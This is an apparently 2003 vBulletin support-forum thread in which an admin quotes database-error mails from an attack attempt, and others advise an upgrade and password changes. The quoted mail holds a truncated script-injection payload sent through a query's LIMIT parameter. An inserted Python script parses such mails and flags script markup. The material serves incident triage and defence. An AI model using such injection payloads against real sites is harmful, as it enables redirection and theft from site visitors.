
Hack attempt...


  • Hack attempt...

    I checked my email today and had gotten 6 mails concerning "database error".

    Someone has tried, dunno if the person succeeded, in hacking/exploiting my boards.

    Here is one of the emails with the errors...
    Database error in vBulletin 2.2.8:

    Invalid SQL: SELECT thread.threadid
    FROM thread,subscribethread
    WHERE subscribethread.threadid=thread.threadid
    AND subscribethread.userid='1071'
    AND thread.visible=1 AND lastpost >= 1051784537
    ORDER BY lastpost DESC
    LIMIT 0,><Script>location='Http://

    mysql error: You have an error in your SQL syntax near '><Script>location='Http://
    ' at line 7

    mysql error number: 1064

    Date: Saturday 31st of May 2003 12:22:17 PM


    As you can see it was from someone at...

    Edit: I have removed the direct link now after Beorn's post, any admin/mod can msg me to get the links, the dude's email address and his IP address if needed.

    Dunno if anything has happened, been damaged, or if the exploiter got any info he shouldn't have, as it was member2.php that is listed in the mail.

    Could anyone tell if it has done any harm?
    Should I close down the boards?




    Just found out that the exploiter actually signed up as a member on my boards, so I have his email address and IP address....
    Last edited by mindbuster; Sat 31 May '03, 9:52am.
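A triage sketch for the error mail quoted in the post above, added here as an example and not part of the original thread or of vBulletin's code: it checks whether non-numeric text or markup reached the LIMIT clause and whether MySQL rejected the statement as a syntax error (1064). The function name `triage`, the markup pattern and the sample constant are assumptions made for the example.

```python
import re

# Constructed sample: the error mail from the post above, with the
# URL left truncated exactly as the poster left it.
SAMPLE_MAIL = """Database error in vBulletin 2.2.8:

Invalid SQL: SELECT thread.threadid
FROM thread,subscribethread
WHERE subscribethread.threadid=thread.threadid
AND subscribethread.userid='1071'
AND thread.visible=1 AND lastpost >= 1051784537
ORDER BY lastpost DESC
LIMIT 0,><Script>location='Http://

mysql error: You have an error in your SQL syntax near '><Script>location='Http://
' at line 7

mysql error number: 1064
"""

# Assumed heuristic for HTML/script markup that has no place in a SQL statement
MARKUP = re.compile(r"<\s*/?\s*(script|iframe|img|svg|object)\b|javascript:|\bon\w+\s*=", re.I)
LIMIT = re.compile(r"\bLIMIT\s+(.*)", re.I | re.S)
ERRNO = re.compile(r"mysql error number:\s*(\d+)", re.I)

def triage(mail: str) -> dict:
    """Summarise one vBulletin 'Database error' mail for an admin."""
    # The failed statement sits between "Invalid SQL:" and "mysql error:"
    sql = mail.split("Invalid SQL:", 1)[-1].split("mysql error:", 1)[0]
    errno = ERRNO.search(mail)
    limit = LIMIT.search(sql)
    limit_arg = limit.group(1).strip() if limit else ""
    return {
        "errno": int(errno.group(1)) if errno else None,
        # 1064 is a parse error: MySQL refused the statement, so it returned no rows
        "rejected_by_parser": bool(errno) and errno.group(1) == "1064",
        # A well-formed LIMIT argument is "count" or "offset,count", digits only
        "limit_is_numeric": bool(re.fullmatch(r"\d+(\s*,\s*\d+)?", limit_arg)),
        "markup_in_sql": bool(MARKUP.search(sql)),
    }

if __name__ == "__main__":
    print(triage(SAMPLE_MAIL))
```

A mail that reports markup in the statement together with error 1064 shows a request parameter reaching the query unvalidated, while that particular statement was refused by MySQL.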

  • #2
    vbexploit.php is no vB file. What does it do?


    • #3
      vBulletin XSS Injection Vulnerability: Exploit
      Coded By: Sp.IC

      It's NOT A VB FILE. Suggest you remove it, and execute who put it there

      Quality Hosting - Viper Internet
      We Make Server Management Easy! - EasyServerManagement.COM


      • #4
        Upgrade your forum to 2.3.0 a.s.a.p and .htaccess/.htpasswd protect your admin/mod/ dirs and change all your admin passwords.


        • #5
          Umm, maybe I should be more specific, the vbexploit.php file is NOT on MY site ( ) , I have nothing to do with the site, that's the hacker site.

          If you try and click the link to the hacker's site you can see it just keeps refreshing.

          I looked inside my members2.php file and there are no traces of any link to the above mentioned site.


          • #6
            Xiphoid, sure, changing password is a safety precaution, but could you explain what the attack could have done? Could he have fetched the encrypted password list? Is that why he signed up as a member himself, then changed his password to more easily decrypt the password list?

            Where can I read about changes from vB 2.8.0 to vB 2.9.0?

            And btw, umm, how do I change admin passwords? Within vBulletin or the admin UI?
            Last edited by mindbuster; Sat 31 May '03, 7:01am.


            • #7
              If you go into the admin CP and look up your name on the user list, there is an option to change your password...


              • #8
                EDIT: Ignore what this said...the script contains a redirect to the referrer....
                Last edited by Beorn; Sat 31 May '03, 9:48am.


                • #9
                  Ohh, ok Beorn, anyway I edited the links out.


                  • #10
                    Immediately do what xiphoid suggested:

                    Originally posted by xiphoid
                    Upgrade your forum to 2.3.0 a.s.a.p and .htaccess/.htpasswd protect your admin/mod/ dirs and change all your admin passwords.
                    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                    Change CKEditor Colors to Match Style (for 4.1.4 and above)

                    Steve Machol Photography

                    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.

